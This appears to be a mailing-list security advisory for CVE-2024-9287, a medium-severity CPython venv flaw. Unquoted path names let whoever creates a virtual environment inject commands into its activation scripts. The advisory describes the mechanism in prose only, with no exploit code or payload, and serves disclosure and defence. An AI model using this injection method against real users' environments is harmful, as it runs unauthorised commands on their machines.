[CVE-2024-9287] Virtual environment (venv) activation scripts don't quote paths
Oct. 22, 2024
4:33 p.m.
There is a MEDIUM severity vulnerability affecting CPython.
A vulnerability has been found in the CPython venv
module and CLI where
path names provided when creating a virtual environment were not quoted
properly, allowing the virtual environment creator to inject commands into
virtual environment "activation" scripts (ie "source venv/bin/activate").
This means that attacker-controlled virtual environments are able to run
commands when the virtual environment is activated. Virtual environments
which are not created by an attacker or which aren't activated before being
used (ie "./venv/bin/python") are not affected.
Please see the linked CVE ID for the latest information on affected versions:
102
Age (days ago)
102
Last active (days ago)
0 comments
1 participants
participants (1)
-
Seth Larson